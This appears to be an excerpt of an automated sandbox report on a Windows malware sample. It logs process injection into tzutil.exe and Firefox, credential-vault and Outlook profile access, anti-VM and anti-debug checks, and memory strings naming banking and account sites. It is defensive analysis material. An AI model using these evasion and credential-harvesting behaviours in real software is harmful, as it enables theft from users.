                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess created: C:\Users\user\Desktop\0Wu31IhwGO.exe "C:\Users\user\Desktop\0Wu31IhwGO.exe"Jump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 0Wu31IhwGO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 0Wu31IhwGO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EPnOHZVVNotZ.exe, 00000007.00000000.2235052111.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3282425393.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 0Wu31IhwGO.exe, 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737E05B pushfd ; ret 0_2_0737E061
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737D04A push CC0737CCh; retf 0_2_0737D051
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004031D0 push eax; ret 4_2_004031D2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004169E7 push 0F6CFD2Bh; ret 4_2_00416A18
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00423A0A push esp; ret 4_2_00423A0D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00419359 push ds; ret 4_2_0041935B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00418366 pushad ; iretd 4_2_00418367
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00408325 push dword ptr [ebx+5Dh]; ret 4_2_0040830B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00417388 push edi; ret 4_2_0041738D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00419477 push edx; ret 4_2_00419485
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00408403 push 00000074h; iretd 4_2_0040840B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00417411 push eax; ret 4_2_00417414
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00411D6F push ds; iretd 4_2_00411DBD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00411D7B push ds; iretd 4_2_00411DBD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0041758A push ebp; ret 4_2_004175A6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0040D66A push ecx; iretd 4_2_0040D6D9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00414E05 push cs; retf 4_2_00414E14
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0040860D push cs; retf 4_2_0040860E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00413E93 pushfd ; ret 4_2_00413F00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00413EBC pushfd ; ret 4_2_00413F00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0132225F pushad ; ret 4_2_013227F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013227FA pushad ; ret 4_2_013227F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013509AD push ecx; mov dword ptr [esp], ecx4_2_013509B6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0132283D push eax; iretd 4_2_01322858
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E1225F pushad ; ret 8_2_02E127F9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E127FA pushad ; ret 8_2_02E127F9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E1283D push eax; iretd 8_2_02E12858
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E409AD push ecx; mov dword ptr [esp], ecx8_2_02E409B6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E11368 push eax; iretd 8_2_02E11369
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A423E push eax; ret 8_2_026A4241
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A62A4 push edx; ret 8_2_026A62B2
                Source: 0Wu31IhwGO.exeStatic PE information: section name: .text entropy: 7.7215249828363035
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: 0Wu31IhwGO.exe PID: 7752, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: 7970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: 8970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: 8B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: 9B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: A5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: B5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: C5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E rdtsc 4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe TID: 7772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 1232Thread sleep time: -52000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe TID: 2128Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026AC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_026AC9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: UQ63g7r-.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: UQ63g7r-.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: UQ63g7r-.8.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: UQ63g7r-.8.drBinary or memory string: global block list test formVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: UQ63g7r-.8.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: tzutil.exe, 00000008.00000002.3282626615.00000000027DD000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3283458873.000000000117F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2626178179.00000222DFBDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: UQ63g7r-.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: UQ63g7r-.8.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: UQ63g7r-.8.drBinary or memory string: discord.comVMware20,11696503903f
                Source: UQ63g7r-.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E rdtsc 4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00417B63 LdrLoadDll,4_2_00417B63
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01380124 mov eax, dword ptr fs:[00000030h]4_2_01380124
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FA118 mov ecx, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FA118 mov eax, dword ptr fs:[00000030h]4_2_013FA118
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov eax, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov ecx, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov eax, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov eax, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov ecx, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov eax, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov eax, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov ecx, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov eax, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FE10E mov ecx, dword ptr fs:[00000030h]4_2_013FE10E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01410115 mov eax, dword ptr fs:[00000030h]4_2_01410115
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]4_2_01356154
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356154 mov eax, dword ptr fs:[00000030h]4_2_01356154
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134C156 mov eax, dword ptr fs:[00000030h]4_2_0134C156
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E8158 mov eax, dword ptr fs:[00000030h]4_2_013E8158
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E4144 mov ecx, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E4144 mov eax, dword ptr fs:[00000030h]4_2_013E4144
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]4_2_014161C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014161C3 mov eax, dword ptr fs:[00000030h]4_2_014161C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D019F mov eax, dword ptr fs:[00000030h]4_2_013D019F
